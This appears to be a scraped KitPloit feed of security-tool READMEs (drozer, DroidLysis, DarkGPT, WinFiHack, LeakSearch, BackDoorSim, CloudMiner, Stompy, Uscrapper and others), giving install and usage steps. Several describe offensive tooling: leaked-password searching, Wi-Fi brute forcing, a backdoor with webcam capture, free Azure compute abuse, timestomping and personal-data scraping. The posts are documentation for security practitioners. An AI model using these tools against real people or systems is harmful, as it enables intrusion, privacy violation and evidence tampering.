    list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
    shell Start an interactive Linux shell on the device, in the context of the Agent process.
    cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
    clean Remove temporary files stored by drozer on the Android device.
    contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
    echo Print text to the console.
    exit Terminate the drozer session.
    help Display help about a particular command or module.
    load Load a file containing drozer commands, and execute them in sequence.
    module Find and install additional drozer modules from the Internet.
    permissions Display a list of the permissions granted to the drozer Agent.
    set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
    unset Remove a named variable that drozer passes to any Linux shells that it spawns.

    License

    drozer is released under a 3-clause BSD License. See LICENSE for full details.

    Contacting the Project

    drozer is Open Source software, made great by contributions from the community.

    Bug reports, feature requests, comments and questions can be submitted here.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    DroidLysis - Property Extractor For Android Apps

    By: Zion3R β€” March 31st 2024 at 11:30


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
    1. Install Android disassembly tools

    2. Apktool ,

    3. Baksmali, and optionally
    4. Dex2jar and
    5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
    1. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

    1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
    1. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
    • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.

    Options

    Get usage with droidlysis --help

    • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

    • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

    • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
    • Libraries lib, assets assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

    SQLite database{#sqlite_database}

    If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

    For example, to retrieve all filename, SHA256 sum and smali properties of the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

    A pattern consist of:

    • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
    • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages

    Importing Exodus Privacy Trackers

    Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
    with open('sorted.conf','w') as f:
    config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R β€” March 24th 2024 at 11:30


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

    1. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

    By: Zion3R β€” March 19th 2024 at 11:30

    This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


    TL;DR

    Installation

    1. Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
    2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
    3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
    4. Download the GAP.py and requirements.txt from this project and place in the same directory.
    5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
    6. Go to the Extensions -> Installed and click Add under Burp Extensions.
    7. Select Extension type of Python and select the GAP.py file.

    Using

    1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

    Or you can right click a request or response in any other context and select GAP from the Extensions menu.

    1. Then go to the GAP tab to see the results:

    IMPORTANT Notes

    If you don't need one of the modes, then un-check it as results will be quicker.

    If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.

    If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

    It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

    The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

    In Depth Instructions

    Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

    NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

    TODO

    • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
    • Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
    • Improve performance of the link finding regular expressions.
    • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
    • Deal with other size displays and font sizes better to make sure all controls are viewable.
    • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
    • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

    Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

    🀘 /XNL-h4ck3r



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R β€” March 13th 2024 at 11:30


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

    git clone https://github.com/luijait/DarkGPT.git cd DarkGPT

    1. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"

    1. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

    pip install -r requirements.txt 4. Then Run the project: python3 main.py



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

    By: Zion3R β€” March 7th 2024 at 11:30


    WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


    Installation

    The packages are minimal or nearly none πŸ˜…. The package install command is:

    pip install rich pyfiglet

    Thats it.


    Features

    So listing the features:

    • Overall Features:
    • We can use custom interfaces or non-default interfaces to run the attack.
    • Well-defined way of using netsh and listing and utilizing targets.
    • Upgradeability
    • Code-Wise Features:
    • Interactive menu-driven system with rich.
    • versatility in using interface, targets, and password files.

    How it works

    So this is how the bruteforcer works:

    • Provide Interface:

    • The user is required to provide the network interface for the tool to use.

    • By default, the interface is set to Wi-Fi.

    • Search and Set Target:

    • The user must search for and select the target network.

    • During this process, the tool performs the following sub-steps:

      • Disconnects all active network connections for the selected interface.
      • Searches for all available networks within range.
    • Input Password File:

    • The user inputs the path to the password file.

    • The default path for the password file is ./wordlist/default.txt.

    • Run the Attack:

    • With the target set and the password file ready, the tool is now prepared to initiate the attack.

    • Attack Procedure:

    • The attack involves iterating through each password in the provided file.
    • For each password, the following steps are taken:
      • A custom XML configuration for the connection attempt is generated and stored.
      • The tool attempts to connect to the target network using the generated XML and the current password.
      • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
      • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
      • This loop continues until a successful ping response is received, indicating a successful connection attempt.

    How to run this

    After installing all the packages just run python main.py rest is history πŸ‘ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:

    Β 


    Contributions

    For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LeakSearch - Search & Parse Password Leaks

    By: Zion3R β€” February 29th 2024 at 23:30


    LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

    In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.


    Requirements
    • Python 3
    • Install requirements

    Download

    It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

    git clone https://github.com/JoelGMSec/LeakSearch

    Usage
      _               _     ____                      _     
    | | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
    | | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
    | |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
    |_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

    ------------------- by @JoelGMSec -------------------

    usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

    options:
    -h, --help show this help message and exit
    -d DATABASE, --database DATABASE
    Database used for the search (ProxyNova or LocalDataBase)
    -k KEYWORD, --keyword KEYWORD
    Keyword (user/domain/pass) to search for leaks in the DB
    -n NUMBER, --number NUMBER
    Number of results to show (default is 20)
    -o OUTPUT, --output OUTPUT
    Save the results as json or txt into a file
    -p PROXY, --proxy PROXY
    Set HTTP/S proxy (like http://localhost:8080)


    The detailed guide of use can be found at the following link:

    https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


    License

    This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


    Credits and Acknowledgments

    This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


    Contact

    This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

    For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

    By: Zion3R β€” February 27th 2024 at 11:30


    New bug bounty(vulnerabilities) collector


    Requirements
    • Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)
    • Chrome WebDriver

    Preview
    # python3 main.py

    *2024-02-20 16:14:47.836189*

    1. Arbitrary File Reading due to Lack of Input Filepath Validation
    - Feb 6th 2024 / High (CVE-2024-0964)
    - gradio-app/gradio
    - https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

    2. View Barcode Image leads to Remote Code Execution
    - Jan 31st 2024 / Critical (CVE: Not yet)
    - dolibarr/dolibarr
    - https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

    (delimiter-based file database)

    # vim feeds.db

    1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
    2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
    3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
    4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
    5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/

    Notes
    • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
    • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
    • If get in trouble In a typical cloud environment, scripts may not function properly within virtual machines (VMs).


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BackDoorSim - An Educational Into Remote Administration Tools

    By: Zion3R β€” February 26th 2024 at 11:30


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

    shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    1. Navigate to the project directory:

    shell $ cd BackDoorSim

    1. Install the required dependencies:

    shell $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational into Remote Administration Tools

    If you want to read our article about Backdoor


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SpeedyTest - Command-Line Tool For Measuring Internet Speed

    By: Zion3R β€” February 21st 2024 at 11:30


    SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


    Features
    • Measure download speed, upload speed, and ping latency.
    • Generate detailed reports with graphical representation of speed test results.
    • Save and export test results in various formats (CSV, JSON, etc.).
    • Customize speed test parameters and server selection.
    • Compare speed test results over time to track performance changes.
    • Integrate SpeedyTest into your own applications using the provided API.
    • track your timeline with saved database

    Installation
    git clone https://github.com/HalilDeniz/SpeedyTest.git

    Requirements

    Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

    pip install -r requirements.txt

    Usage

    Run the following command to perform a speed test:

    python3 speendytest.py

    Visual Output



    Output
    Receiving data \
    Speed test completed!
    Speed test time: 20.22 second
    Server : Farknet - Konya
    IP Address: speedtest.farknet.com.tr:8080
    Country : Turkey
    City : Konya
    Ping : 20.41 ms
    Download : 90.12 Mbps
    Loading : 20 Mbps







    Contributing

    Contributions are welcome! To contribute to SpeedyTest, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:


    License

    SpeedyTest is released under the MIT License. See LICENSE for details.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MrHandler - Linux Incident Response Reporting

    By: Zion3R β€” February 17th 2024 at 23:30

    Β 


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

    By: Zion3R β€” February 9th 2024 at 11:30


    Execute code within Azure Automation service without getting charged

    Description

    CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

    • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

    • Each execution is limited to 3 hours


    Requirements

    1. Python 3.8+ with the libraries mentioned in the file requirements.txt
    2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
      • Account must be logged in before using this tool

    Installation

    pip install .

    Usage

    usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

    CloudMiner - Free computing power in Azure Automation Service

    optional arguments:
    -h, --help show this help message and exit
    --path PATH the script path (Powershell or Python)
    --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
    utomationAccounts/{automationAccountName}
    -c COUNT, --count COUNT
    number of executions
    -t TOKEN, --token TOKEN
    Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
    -r REQUIREMENTS, --requirements REQUIREMENTS
    Path to requirements file to be installed and use by the script (relevant to Python scripts only)
    -v, --verbose Enable verbose mode

    Example usage

    Python

    Powershell

    License

    CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

    Author - Ariel Gamrian



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

    By: Zion3R β€” January 31st 2024 at 11:30


    A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

    • Change timestamps for individual files or directories.
    • Recursively apply timestamps to all files in a directory.
    • Option to use specific credentials for remote paths or privileged files.

    I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

    Usage

    • -Path: The path to the file or directory whose timestamps you wish to modify.
    • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
    • -Credentials: (Optional) If you need to specify a different user's credentials.
    • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

    Usage Examples

    Specify the -Recurse switch to apply timestamps recursively:

    1. Change the timestamp of an individual file:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
    1. Recursively change timestamps for all files in a directory:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
    1. Use specific credentials:
    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R β€” January 22nd 2024 at 11:30


    Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

